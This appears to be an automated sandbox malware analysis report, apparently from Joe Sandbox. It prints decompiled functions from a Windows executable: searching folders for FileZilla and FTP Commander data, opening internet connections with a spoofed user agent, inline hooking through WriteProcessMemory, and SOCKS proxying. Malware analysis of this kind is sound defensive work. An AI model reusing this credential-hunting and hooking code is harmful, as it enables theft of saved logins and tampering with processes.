API ID: Find$FilePath$CloseFirstFolderMatchNextObjectSingleSleepSpecWait
String ID: #$&$FTP Commander$ftp*commander*
API String ID: 1211921070-1802917355
Opcode ID: d9ce3d69e89cb993ed4d5f8320d0448ad94950b4982496c1e8cb00909b5c1e57
Instruction ID: 187bf97101a5fd58f2bcb414459935c3e215890619a49b95ebdcffc87a73c8f6
Opcode Fuzzy Hash: d9ce3d69e89cb993ed4d5f8320d0448ad94950b4982496c1e8cb00909b5c1e57
Instruction Fuzzy Hash: D6016D72901128BADB20AA92DC4DEDF7B7CEF45344F004066A505B21D1D7785B48CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 004060A2, Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 50
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E004060A2() {
				intOrPtr _v8;
				char _v12;
				char* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v548;
				char* _t18;
				signed int _t25;
				void* _t27;

				_v28 = 0x26;
				_v24 = 0x1a;
				_v20 = 0x23;
				_v16 = L"*filezilla*";
				E004098AA( &_v12,  &_v12, 0, 8);
				_t25 = 0;
				do {
					_t18 =  &_v548;
					__imp__SHGetFolderPathW(0,  *((intOrPtr*)(_t27 + _t25 * 4 - 0x18)), 0, 0, _t18);
					_t29 = _t18;
					if(_t18 == 0) {
						_t24 =  &_v16;
						_t18 = E0040B4D8( &_v548,  &_v16, _t29, 1, 2, E00405E5C,  &_v12, 0, 0, 0);
					}
					_t25 = _t25 + 1;
				} while (_t25 < 3);
				_t31 = _v8;
				if(_v8 > 0) {
					E00412508(_t18, _v12, _t24, _t31, L"FileZilla");
				}
				return E004097F7(_v12);
			}

0x004060b6
0x004060bd
0x004060c4
0x004060cb
0x004060d2
0x004060d7
0x004060d9
0x004060d9
0x004060e7
0x004060ed
0x004060ef
0x00406101
0x0040610a
0x0040610a
0x0040610f
0x00406110
0x00406115
0x00406118
0x00406122
0x00406122
0x00406132

APIs

SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,?,?,00000000,00000008), ref: 004060E7

Part of subcall function 0040B4D8: FindFirstFileW.KERNEL32(?,?,?,?,?,?,00000000), ref: 0040B517
Part of subcall function 0040B4D8: WaitForSingleObject.KERNEL32(00000000,00000000,?,?,?,00000000), ref: 0040B53E
Part of subcall function 0040B4D8: PathMatchSpecW.SHLWAPI(?,?,?,?,?,00000000), ref: 0040B589
Part of subcall function 0040B4D8: Sleep.KERNEL32(00000000,?,?), ref: 0040B5E6
Part of subcall function 0040B4D8: FindNextFileW.KERNEL32(?,?,?,?,?,00000000), ref: 0040B614
Part of subcall function 0040B4D8: FindClose.KERNEL32(?,?,?,?,00000000), ref: 0040B626

Strings

FileZilla, xrefs: 0040611D
*filezilla*, xrefs: 004060CB
&, xrefs: 004060B6
#, xrefs: 004060C4

Memory Dump Source

Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Yara matches

Similarity

API ID: Find$FilePath$CloseFirstFolderMatchNextObjectSingleSleepSpecWait
String ID: #$&$*filezilla*$FileZilla
API String ID: 1211921070-3096872711
Opcode ID: 4a9638e1c729495e3a06518011fadd5d62c043f61d078d0d7e6a62dd93aaadf0
Instruction ID: 3fe1d5a9cda30fc07575ab88d9b3c37ccfc8ae342e46bd08777d93e6ec157a08
Opcode Fuzzy Hash: 4a9638e1c729495e3a06518011fadd5d62c043f61d078d0d7e6a62dd93aaadf0
Instruction Fuzzy Hash: BE016D72A01228BADB20AA92DC59FDF7F7CEF45744F00406AA505B61C1D7B81B45CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 0040A9C3, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 46
networkCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040A9C3(signed int __eax, char* __ecx) {
				short _v28;
				char* _v32;
				signed int _t5;
				void* _t12;
				void* _t14;
				char* _t15;
				void* _t18;

				_t15 = __ecx;
				_t5 = __eax;
				if(__ecx == 0) {
					_t15 = "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1)";
				}
				_t14 = InternetOpenA(_t15,  !_t5 & 0x00000001, 0, 0, 0);
				if(_t14 == 0) {
					L7:
					return 0;
				}
				_t18 = 0;
				do {
					_t1 = _t18 + 0x41900c; // 0x41900c
					_t2 = _t18 + 0x419008; // 0x2
					InternetSetOptionA(_t14,  *_t2, _t1, 4);
					_t18 = _t18 + 8;
				} while (_t18 < 0x18);
				_t12 = InternetConnectA(_t14, _v32, _v28, 0, 0, 3, 0, 0);
				if(_t12 == 0) {
					InternetCloseHandle(_t14);
					goto L7;
				}
				return _t12;
			}

0x0040a9c3
0x0040a9c3
0x0040a9c9
0x0040a9cb
0x0040a9cb
0x0040a9e0
0x0040a9e4
0x0040aa28
0x00000000
0x0040aa28
0x0040a9e7
0x0040a9e9
0x0040a9eb
0x0040a9f2
0x0040a9f9
0x0040a9ff
0x0040aa02
0x0040aa16
0x0040aa1f
0x0040aa22
0x00000000
0x0040aa22
0x0040aa2c

APIs

InternetOpenA.WININET(?,?,00000000,00000000,00000000), ref: 0040A9DA
InternetSetOptionA.WININET(00000000,00000002,0041900C,00000004), ref: 0040A9F9
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040AA16
InternetCloseHandle.WININET(00000000), ref: 0040AA22

Strings

Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1), xrefs: 0040A9CB, 0040A9D9

Memory Dump Source

Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Yara matches

Similarity

API ID: Internet$CloseConnectHandleOpenOption
String ID: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1)
API String ID: 910987326-3737944857
Opcode ID: 46732d16fed6cf584eed92be6836cc95d28c13d8f594663cef60e4d6497dc0a8
Instruction ID: b5a6bfa42ed4d4e0707bed6d15ab7d90994a7b3979132c74d0bd4dbd6d63f2e5
Opcode Fuzzy Hash: 46732d16fed6cf584eed92be6836cc95d28c13d8f594663cef60e4d6497dc0a8
Instruction Fuzzy Hash: 81F0CD722003007AE62157618C8CDAB7AADFBCDB95B08082AF946F10A1D23688608779

Uniqueness

Uniqueness Score: -1.00%

Function 0040AE3B, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 44
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 54%

			E0040AE3B() {
				char _v8;
				struct HINSTANCE__* _v12;
				void* _v1036;
				struct HINSTANCE__* _t13;
				_Unknown_base(*)()* _t15;
				char _t22;
				void* _t28;

				_t22 = 0;
				_t13 = LoadLibraryA("urlmon.dll");
				_v12 = _t13;
				if(_t13 != 0) {
					_t15 = GetProcAddress(_t13, "ObtainUserAgentString");
					if(_t15 != 0) {
						_push( &_v8);
						_push( &_v1036);
						_push(0);
						_v8 = 0x3ff;
						_v1036 = 0;
						if( *_t15() == 0) {
							if(_v8 > 0x3ff) {
								_v8 = 0x3ff;
							}
							 *((char*)(_t28 + _v8 - 0x408)) = _t22;
							_t22 = E00409B94( &_v1036 | 0xffffffff,  &_v1036);
						}
					}
					FreeLibrary(_v12);
				}
				return _t22;
			}

0x0040ae4a
0x0040ae4c
0x0040ae52
0x0040ae57
0x0040ae5f
0x0040ae67
0x0040ae6d
0x0040ae74
0x0040ae7a
0x0040ae7b
0x0040ae7e
0x0040ae88
0x0040ae8d
0x0040ae8f
0x0040ae8f
0x0040ae95
0x0040aeab
0x0040aeab
0x0040aead
0x0040aeb1
0x0040aeb1
0x0040aebb

APIs

LoadLibraryA.KERNEL32(urlmon.dll,00000000), ref: 0040AE4C
GetProcAddress.KERNEL32(00000000,ObtainUserAgentString), ref: 0040AE5F
FreeLibrary.KERNEL32(?), ref: 0040AEB1

Strings

ObtainUserAgentString, xrefs: 0040AE59
urlmon.dll, xrefs: 0040AE45

Memory Dump Source

Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Yara matches

Similarity

API ID: Library$AddressFreeLoadProc
String ID: ObtainUserAgentString$urlmon.dll
API String ID: 145871493-2685262326
Opcode ID: 5d2647cf2e5a827ac9efc22e1c1d64a22661d81eba7ad1dfe8dfbd7d0803629b
Instruction ID: ce13f8a26620cfd4a0f0c1fcd85be38cde7e0149e376efc3e652a9c93990788b
Opcode Fuzzy Hash: 5d2647cf2e5a827ac9efc22e1c1d64a22661d81eba7ad1dfe8dfbd7d0803629b
Instruction Fuzzy Hash: 3E018471D40318BFCB10DBE8DE885DE7BB8AF14300F2005BAA655F32D1D6789F448A69

Uniqueness

Uniqueness Score: -1.00%

Function 00410821, Relevance: 7.6, APIs: 5, Instructions: 111
fileCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E00410821(void* __ecx, signed int __edx, void** __esi, long _a4) {
				char _v5;
				void _v16;
				struct _OVERLAPPED* _v24;
				struct _OVERLAPPED* _v28;
				signed int _v32;
				signed int _v36;
				void* _t29;
				signed int _t31;
				int _t38;
				int _t39;
				signed int _t41;
				int _t42;
				int _t45;
				intOrPtr _t48;
				void* _t49;
				signed int _t53;
				struct _OVERLAPPED* _t54;
				void** _t56;

				_t56 = __esi;
				_t53 = __edx;
				_t49 = __ecx;
				_t54 = 0;
				_v5 = 0;
				_t29 = CreateFileW(_a4, 0xc0000000, 1, 0, 4, 0x80, 0);
				 *__esi = _t29;
				if(_t29 != 0xffffffff) {
					_t31 = E0040B165(_t49, _t29);
					_v36 = _t31;
					_v32 = _t53;
					if((_t31 & _t53) == 0xffffffff) {
						L4:
						CloseHandle( *_t56);
						 *_t56 =  *_t56 | 0xffffffff;
					} else {
						if((_t31 | _t53) == 0) {
							L18:
							_t56[2] = _t56[2] | 0xffffffff;
							_t25 =  &(_t56[3]);
							 *_t25 = _t56[3] | 0xffffffff;
							__eflags =  *_t25;
							_v5 = 1;
							E0040B115( *_t56, _t54, _t54, _t54);
						} else {
							_v28 = 0;
							_v24 = 0;
							if(ReadFile( *__esi,  &_v16, 5,  &_a4, 0) != 0) {
								while(1) {
									__eflags = _a4 - _t54;
									if(_a4 == _t54) {
										goto L18;
									}
									__eflags = _a4 - 5;
									if(_a4 != 5) {
										L16:
										_t38 = E0040B115( *_t56, _v28, _v24, _t54);
										__eflags = _t38;
										if(_t38 == 0) {
											goto L4;
										} else {
											_t39 = SetEndOfFile( *_t56);
											__eflags = _t39;
											if(_t39 == 0) {
												goto L4;
											} else {
												goto L18;
											}
										}
									} else {
										_t41 = _v16 ^ _t56[4];
										asm("adc edi, [ebp-0x14]");
										_t48 = _t41 + _v28 + 5;
										asm("adc edi, ecx");
										_v16 = _t41;
										__eflags = 0 - _v32;
										if(__eflags > 0) {
											L15:
											_t54 = 0;
											__eflags = 0;
											goto L16;
										} else {
											if(__eflags < 0) {
												L11:
												__eflags = _t41 - 0xa00000;
												if(_t41 > 0xa00000) {
													goto L15;
												} else {
													_t42 = E0040B115( *_t56, _t41, 0, 1);
													__eflags = _t42;
													if(_t42 == 0) {
														goto L4;
													} else {
														_v28 = _t48;
														_v24 = 0;
														_t45 = ReadFile( *_t56,  &_v16, 5,  &_a4, 0);
														__eflags = _t45;
														if(_t45 != 0) {
															_t54 = 0;
															__eflags = 0;
															continue;
														} else {
															goto L4;
														}
													}
												}
											} else {
												__eflags = _t48 - _v36;
												if(_t48 > _v36) {
													goto L15;
												} else {
													goto L11;
												}
											}
										}
									}
									goto L19;
								}
								goto L18;
							} else {
								goto L4;
							}
						}
					}
				}
				L19:
				return _v5;
			}

0x00410821
0x00410821
0x00410821
0x00410829
0x0041083e
0x00410842
0x00410848
0x0041084d
0x00410854
0x0041085d
0x00410860
0x00410866
0x0041088d
0x0041088f
0x00410895
0x00410868
0x0041086a
0x00410932
0x00410932
0x00410936
0x00410936
0x00410936
0x0041093f
0x00410943
0x00410870
0x0041087d
0x00410880
0x0041088b
0x0041089f
0x0041089f
0x004108a2
0x00000000
0x00000000
0x004108a8
0x004108ac
0x0041090c
0x00410915
0x0041091a
0x0041091c
0x00000000
0x00410922
0x00410924
0x0041092a
0x0041092c
0x00000000
0x00000000
0x00000000
0x00000000
0x0041092c
0x004108ae
0x004108b1
0x004108bd
0x004108c0
0x004108c3
0x004108c5
0x004108c8
0x004108cb
0x0041090a
0x0041090a
0x0041090a
0x00000000
0x004108cd
0x004108cd
0x004108d4
0x004108d4
0x004108d9
0x00000000
0x004108db
0x004108e1
0x004108e6
0x004108e8
0x00000000
0x004108ea
0x004108f8
0x004108fb
0x004108fe
0x00410904
0x00410906
0x0041089d
0x0041089d
0x00000000
0x00410908
0x00000000
0x00410908
0x00410906
0x004108e8
0x004108cf
0x004108cf
0x004108d2
0x00000000
0x00000000
0x00000000
0x00000000
0x004108d2
0x004108cd
0x004108cb
0x00000000
0x004108ac
0x00000000
0x00000000
0x00000000
0x00000000
0x0041088b
0x0041086a
0x00410866
0x00410948
0x0041094e

APIs

CreateFileW.KERNEL32(00000000,C0000000,00000001,00000000,00000004,00000080,00000000,00000000,00000000), ref: 00410842

Part of subcall function 0040B165: GetFileSizeEx.KERNEL32(00410859,00410859,?,?,?,00410859,00000000), ref: 0040B171

ReadFile.KERNEL32(?,?,00000005,00000000,00000000,00000000), ref: 00410883
CloseHandle.KERNEL32(?,00000000), ref: 0041088F
ReadFile.KERNEL32(?,?,00000005,00000005,00000000,?,?,00000000,00000001), ref: 004108FE
SetEndOfFile.KERNEL32(?,?,?,?,00000000), ref: 00410924

Memory Dump Source

Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Yara matches

Similarity

API ID: File$Read$CloseCreateHandleSize
String ID:
API String ID: 1850650832-0
Opcode ID: 769c7ff2a0d208efa8ca2f02d1ba7244e21fbd7351909dadc1a8194520d788cc
Instruction ID: 5f9472da4a0aaf2be87d9083ee32606abdc65a81ad7bca5b9b9bc571f2557acd
Opcode Fuzzy Hash: 769c7ff2a0d208efa8ca2f02d1ba7244e21fbd7351909dadc1a8194520d788cc
Instruction Fuzzy Hash: 9A41D570940208AEEF249F65CC45FEFBBB9EF84350F10422AF595E62A1C77945C1CB99

Uniqueness

Uniqueness Score: -1.00%

Function 0040F207, Relevance: 7.6, APIs: 5, Instructions: 102
injectionCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E0040F207(void* __eax, void* __ecx, void* __edx, void* __eflags, void* _a4, void* _a8) {
				long _v8;
				DWORD* _v12;
				intOrPtr _v47;
				void _v48;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t47;
				void* _t57;
				void* _t60;
				void* _t61;
				char* _t63;
				long _t65;
				DWORD* _t66;
				void* _t68;

				_t61 = __edx;
				_t60 = __ecx;
				_t57 = __eax;
				_t66 = 0;
				_v12 = 0;
				if(E0040F1C2(_a4) < 0x1e || VirtualProtectEx(0xffffffff, _a4, 0x1e, 0x40,  &_v8) == 0) {
					L17:
					return _v12;
				} else {
					E004098AA( &_v48,  &_v48, 0xffffff90, 0x23);
					if(ReadProcessMemory(0xffffffff, _a4,  &_v48, 0x1e, 0) == 0) {
						L16:
						VirtualProtectEx(0xffffffff, _a4, 0x1e, _v8,  &_v8);
						goto L17;
					} else {
						_t63 =  &_v48;
						_push(0);
						_push(_t63);
						while(1) {
							_t47 = E00415980(_t57, _t60, _t61, _t63, _t66);
							if(_t47 == 0xffffffff) {
								break;
							}
							_t66 = _t66 + _t47;
							if(_t66 > 0x1e) {
								L15:
								goto L16;
							}
							if( *_t63 == 0xe9 && _t47 == 5) {
								 *((intOrPtr*)(_t63 + 1)) =  *((intOrPtr*)(_t63 + 1)) + _a4 - _a8;
							}
							_push(0);
							if(_t66 >= 5) {
								_t17 = _t66 + 5; // 0x5
								_t65 = _t17;
								 *((intOrPtr*)(_t68 + _t66 - 0x2b)) = _a4 - _a8 - 5;
								 *((char*)(_t68 + _t66 - 0x2c)) = 0xe9;
								if(WriteProcessMemory(0xffffffff, _a8,  &_v48, _t65, ??) != 0) {
									_v48 = 0xe9;
									_v47 = _t57 - _a4 - 5;
									if(WriteProcessMemory(0xffffffff, _a4,  &_v48, 5, 0) != 0) {
										_v12 = _t65;
									}
								}
								goto L15;
							} else {
								_t63 = _t68 + _t66 - 0x2c;
								_push(_t63);
								continue;
							}
						}
						goto L15;
					}
				}
			}

0x0040f207
0x0040f207
0x0040f20f
0x0040f214
0x0040f216
0x0040f221
0x0040f308
0x0040f30e
0x0040f242
0x0040f24a
0x0040f263
0x0040f2f4
0x0040f302
0x00000000
0x0040f269
0x0040f26a
0x0040f26d
0x0040f270
0x0040f299
0x0040f299
0x0040f2a1
0x00000000
0x00000000
0x0040f273
0x0040f278
0x0040f2f3
0x00000000
0x0040f2f3
0x0040f27d
0x0040f28a
0x0040f28a
0x0040f28d
0x0040f292
0x0040f2ab
0x0040f2ab
0x0040f2b1
0x0040f2bd
0x0040f2ce
0x0040f2e3
0x0040f2e7
0x0040f2ee
0x0040f2f0
0x0040f2f0
0x0040f2ee
0x00000000
0x0040f294
0x0040f294
0x0040f298
0x00000000
0x0040f298
0x0040f292
0x00000000
0x0040f2a3
0x0040f263

APIs

Part of subcall function 0040F1C2: VirtualQueryEx.KERNEL32(000000FF,0774C084,?,0000001C,00407790,0774C084,?,?,?,00404B07,00000000,00000000,00000012,00419020), ref: 0040F1D7

VirtualProtectEx.KERNEL32(000000FF,00407798,0000001E,00000040,00000000,00407790,00000012,?,?,00000000,?,?,?,00404DB0,00419020), ref: 0040F234
ReadProcessMemory.KERNEL32(000000FF,00407798,?,0000001E,00000000,?,00000090,00000023,?,?,00000000,?,?,?,00404DB0,00419020), ref: 0040F25B
WriteProcessMemory.KERNEL32(000000FF,00000000,?,00000005,00000000,?,00000000,00000000), ref: 0040F2CA
WriteProcessMemory.KERNEL32(000000FF,00407798,000000E9,00000005,00000000), ref: 0040F2EA
VirtualProtectEx.KERNEL32(000000FF,00407798,0000001E,00000000,00000000,?,?,00000000,?,?,?,00404DB0,00419020), ref: 0040F302

Memory Dump Source

Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Yara matches

Similarity

API ID: MemoryProcessVirtual$ProtectWrite$QueryRead
String ID:
API String ID: 390532180-0
Opcode ID: 4e95bbf845e7ee6b9ab14727c454712a9ebbfee3ae15f18ba071d0f002fc602d
Instruction ID: 81bee3abc07e41f1567cba4bc790272c6a00d6d0162ae91187234a9f2cc3d9db
Opcode Fuzzy Hash: 4e95bbf845e7ee6b9ab14727c454712a9ebbfee3ae15f18ba071d0f002fc602d
Instruction Fuzzy Hash: D8316F76900209BADF209EB8CD44EDE7B68AB09730F108336F921BA1D0D674DA459BA5

Uniqueness

Uniqueness Score: -1.00%

Function 0040CD58, Relevance: 7.6, APIs: 5, Instructions: 65networkCOMMON

Download Yara Rule

APIs

socket.WS2_32(00401458,00000002,00000000), ref: 0040CD6A
WSAIoctl.WS2_32(00000000,48000016,00000000,00000000,00020000,00000000,00020000,00000000,00000000), ref: 0040CD94
WSAGetLastError.WS2_32 ref: 0040CD9B

Part of subcall function 004097CC: HeapAlloc.KERNEL32(00000008,-00000004,0040F499,00000000,?,?,?,?,00407564,00000000,00407832,?,00000000), ref: 004097D8

WSAIoctl.WS2_32(00000000,48000016,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040CDCD

Part of subcall function 004097F7: HeapFree.KERNEL32(00000000,00000000,0040F4F2,00000000,?,?,?,?,00407564,00000000,00407832), ref: 0040980A

closesocket.WS2_32(?), ref: 0040CDE1

Memory Dump Source

Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Yara matches

Similarity

API ID: HeapIoctl$AllocErrorFreeLastclosesocketsocket
String ID:
API String ID: 3987134166-0
Opcode ID: ada10e318ec9d78caef647bb69398b3cacc4aa2ee2bfa2ea5e4857f3032faccf
Instruction ID: aa0ae96bb59258b0e3483138c9d7eb5c5f0a928a29e454bba617148aadb03d81
Opcode Fuzzy Hash: ada10e318ec9d78caef647bb69398b3cacc4aa2ee2bfa2ea5e4857f3032faccf
Instruction Fuzzy Hash: 84112BB5801128FBDB20AFA5DD88CDF7F6DEF057A4B104276F905B65A0D2348E40EAA4

Uniqueness

Uniqueness Score: -1.00%

Function 004090AC, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 131
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004090AC(void* __ecx, CHAR** _a4, char _a7) {
				char _v8;
				signed int _v12;
				char _v16;
				short _v18;
				char _v20;
				intOrPtr _v24;
				char _v32;
				void* _v288;
				signed char _v292;
				char _v776;
				char _v780;
				void* __edi;
				void* __esi;
				signed short _t45;
				signed int _t55;
				char _t58;
				signed int _t62;
				signed int _t75;
				CHAR** _t77;
				CHAR*** _t84;

				_t78 = __ecx;
				E004098AA( &_v292,  &_v292, 0, 0x104);
				_t77 = _a4;
				if(lstrcmpiA( *_t77, "socks") != 0) {
					_t45 = E00409DCE( *_t77, _t78, 0);
					_t5 = _t45 - 1; // -1
					_t78 = _t5;
					__eflags = _t5 - 0xfffd;
					if(_t5 > 0xfffd) {
						goto L18;
					}
					_t55 = _t45 & 0x0000ffff;
					_v12 = _t55;
					__eflags = _t55;
					if(_t55 == 0) {
						goto L18;
					}
					goto L4;
				} else {
					_v12 = _v12 | 0xffffffff;
					L4:
					_t58 = E0040C8A8(E00409DCE(_t77[2], _t78, 0), _t78, _t77[1]);
					_v8 = _t58;
					if(_t58 == 0xffffffff) {
						L18:
						WaitForMultipleObjects(_v292 & 0x000000ff,  &_v288, 1, 0xffffffff);
						E0040ED5F( &_v292);
						E004097F7( *_t77);
						E004097F7(_t77[1]);
						E004097F7(_t77[2]);
						E0040DD1D(_t77[3]);
						E004097F7(_t77);
						return 0;
					}
					E0040CC2C(_t78, _t58);
					E0040CBEA(_v8);
					_t62 = E00407B82(_t78,  &_v780);
					_t79 =  &_v776;
					_t64 = E0040A655(_t62 | 0xffffffff,  &_v776,  &_v32);
					_t94 = _t64;
					if(_t64 == 0) {
						L17:
						E0040CBD4(_t64, _v8);
						goto L18;
					}
					_a7 = E00410211( &_v776, _v24, _t94, _v8, 1, _v32);
					_t64 = E0040A645( &_v32);
					if(_a7 == 0) {
						goto L17;
					}
					while(E0040CB16(0,  &_v8, 0) == _v8) {
						_t64 = E0041011C( &_v20, _t79, _v8,  &_a4);
						__eflags = _t64;
						if(_t64 == 0) {
							goto L17;
						}
						__eflags = _v16 - 2;
						if(_v16 == 2) {
							__eflags = _v18 - 4;
							if(_v18 == 4) {
								_t84 = HeapAlloc( *0x41a570, 8, 0x10);
								__eflags = _t84;
								if(_t84 != 0) {
									_t84[1] = _v12;
									 *_t84 = _t77;
									_t84[2] =  *_a4;
									_t75 = E0040ED1A( &_v292, 0x20000, E00408FDE, _t84);
									__eflags = _t75;
									if(_t75 == 0) {
										E004097F7(_t84);
									}
								}
								E0040ECC8(_t79,  &_v292);
							}
						}
						E004097F7(_a4);
					}
					goto L17;
				}
			}

0x004090ac
0x004090c6
0x004090cb
0x004090dd
0x004090e9
0x004090ee
0x004090ee
0x004090f1
0x004090f7
0x00000000
0x00000000
0x004090fd
0x00409100
0x00409103
0x00409105
0x00000000
0x00000000
0x00000000
0x004090df
0x004090df
0x0040910b
0x00409118
0x0040911d
0x00409123
0x00409219
0x0040922c
0x00409238
0x0040923f
0x00409247
0x0040924f
0x00409257
0x0040925d
0x00409268
0x00409268
0x0040912a
0x00409132
0x0040913e
0x00409149
0x0040914f
0x00409154
0x00409156
0x00409211
0x00409214
0x00000000
0x00409214
0x0040916f
0x00409172
0x0040917b
0x00000000
0x00000000
0x004091fc
0x0040918d
0x00409192
0x00409194
0x00000000
0x00000000
0x00409196
0x0040919a
0x0040919c
0x004091a1
0x004091b3
0x004091b5
0x004091b7
0x004091bc
0x004091c3
0x004091d7
0x004091da
0x004091df
0x004091e1
0x004091e4
0x004091e4
0x004091e1
0x004091ef
0x004091ef
0x004091a1
0x004091f7
0x004091f7
0x00000000
0x004091fc

APIs

lstrcmpiA.KERNEL32(?,socks,?,00000000,00000104), ref: 004090D5
HeapAlloc.KERNEL32(00000008,00000010,?,?,00000000,?,00000001,?,?,?,00000000,?), ref: 004091AD

Part of subcall function 0040ED1A: SetLastError.KERNEL32(0000009B,00415911,00000000,004157C7,00000000,004191C8,00000000,00407E47,004191C8,00000000,00000104,74B5F560,00000000,004080C4,00000001), ref: 0040ED24

Part of subcall function 004097F7: HeapFree.KERNEL32(00000000,00000000,0040F4F2,00000000,?,?,?,?,00407564,00000000,00407832), ref: 0040980A

WaitForMultipleObjects.KERNEL32(?,?,00000001,000000FF), ref: 0040922C

Strings

socks, xrefs: 004090CE

Memory Dump Source

Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Yara matches

Similarity

API ID: Heap$AllocErrorFreeLastMultipleObjectsWaitlstrcmpi
String ID: socks
API String ID: 3361116139-511798724
Opcode ID: d4d7042a85951943f72a512cb4ad488bfbe457d257a8d59fa37b78e7bff6fd32
Instruction ID: bc8e2b8e7286b2f4876667b51f5f8ce0adaa9835a66361a97bb73d61f2135741
Opcode Fuzzy Hash: d4d7042a85951943f72a512cb4ad488bfbe457d257a8d59fa37b78e7bff6fd32
Instruction Fuzzy Hash: C841C131900209AADF11AFA1CC86ADDBB75AF04318F1045BBF554BB1E3CB789E519B58

Uniqueness

Uniqueness Score: -1.00%

Function 0040E6D9, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 105
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040E6D9(signed int __eax, signed int __ecx, void* __eflags, signed int _a4, signed short* _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				char* _v28;
				char* _v32;
				signed int _t56;
				WCHAR* _t57;
				short* _t59;
				signed short _t72;
				char* _t78;
				signed int _t85;
				signed short* _t86;
				signed int _t88;
				intOrPtr _t89;
				void* _t90;

				_t88 = E0040B82B(__eax & 0x000000ff, __ecx & 0x000000ff);
				_v16 = _t88;
				_t56 = E0040B7DF();
				_t78 = "bcdfghklmnpqrstvwxz";
				if((_t56 & 0x00000100) == 0) {
					_v32 = "aeiouy";
					_v28 = _t78;
				} else {
					_v32 = _t78;
					_v28 = "aeiouy";
				}
				_t85 = 0;
				_v12 = 0;
				_v8 = 0;
				if(_t88 > 0) {
					_v20 = _a4 & 0x00000004;
					do {
						if(_v8 == 2) {
							if((E0040B7DF() & 0x00000100) == 0) {
								_v32 = "aeiouy";
								_v28 = _t78;
							} else {
								_v32 = _t78;
								_v28 = "aeiouy";
							}
							_v8 = _v8 & 0x00000000;
						}
						_t89 =  *((intOrPtr*)(_t90 + _v8 * 4 - 0x1c));
						_v24 = ((0 | _t89 != _t78) - 0x00000001 & 0x0000000d) + 6;
						if(_v20 == 0 || _t85 - _v12 <= 1 || (E0040B7DF() & 0x00000101) != 0x101) {
							_t72 =  *((char*)(E0040B82B(_v24 - 1, 0) + _t89));
						} else {
							_t72 = 0x20;
							_v12 = _t85;
						}
						_a8[_t85] = _t72;
						_t85 = _t85 + 1;
						_v8 = _v8 + 1;
					} while (_t85 < _v16);
					_t88 = _v16;
				}
				if((_a4 & 0x00000004) == 0 || _t88 <= 0) {
